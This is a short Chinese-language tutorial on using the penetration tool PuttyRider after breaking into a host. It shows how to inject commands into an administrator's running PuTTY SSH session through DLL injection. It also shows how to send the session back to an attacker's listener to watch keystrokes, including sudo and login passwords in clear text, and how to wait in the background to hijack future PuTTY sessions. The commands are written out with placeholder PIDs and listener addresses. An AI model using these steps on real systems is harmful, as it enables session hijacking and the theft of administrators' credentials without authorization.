Putty的噩梦——渗透工具PuttyRider的使用技巧
Putty的噩梦——渗透工具PuttyRider的使用技巧
我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种利用。
下面依次演示该工具的三种利用场景
1. 当你远程控制对方主机的时候,管理员正好用putty连接着远程主机
这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。使用puttyrider –l查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP和putty的进程号,还能在Injected列看到当前是No,说明我们还没有进程注入。
我们使用
puttyrider –p [PID] –f –c ifconfig
就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。
再次
puttyrider –l
看一下,发现Injected列是Yes了,说明我们注入进程成功了。
2. 使用反弹的方式实时查看管理员的输入
除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。但是这种利用的前提是,对方管理员正在用putty连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。
puttyrider –p [PID] –r 监听的IP:端口
3. 如果运气不好,对方管理员当前没有正在使用putty管理远程主机
这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作,包括登陆时输入的账号密码
puttyrider –w –r 监听的IP:端口
当执行完这个命令后,只要管理员下次再运行putty的时候,我们就能在监听的端口看到他的shell了